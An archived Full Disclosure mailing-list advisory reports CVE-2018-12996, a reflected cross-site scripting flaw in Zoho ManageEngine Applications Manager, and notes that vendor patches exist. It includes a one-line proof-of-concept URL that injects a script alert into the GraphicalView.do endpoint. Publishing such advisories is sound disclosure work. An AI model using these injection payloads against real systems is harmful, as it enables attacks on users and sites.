[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] [CVE-2018-12996] Zoho manageengine Applications Manager Reflected XSS
From:       "=?utf-8?B?eGlhb3RpYW4ud2FuZw==?="<xiaotian.wang () dbappsecurity ! com ! cn>
Date:       2018-07-20 6:04:28
Message-ID: tencent_70DD4BFFAD9BFDF2EE916658 () qq ! com
[Download RAW message or body]

[Attachment #2 (multipart/related)]

[Attachment #4 (text/plain)]

This issue has been reported to the vendor who has already published patches for this issue.
https://www.manageengine.com/products/applications_manager/issues.html


==========================
Advisory:Zoho manageengine Applications Manager Reflected XSSVulnerability
Author: M3 From DBAppSecurity
Affected Version: All
==========================
Proof of Concept:
==========================
/GraphicalView.do?method=createBusinessService"scriptalert(5045)/script


Notice: It can be successfully reproduced under IE.
["1111.png" (application/octet-stream)]

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic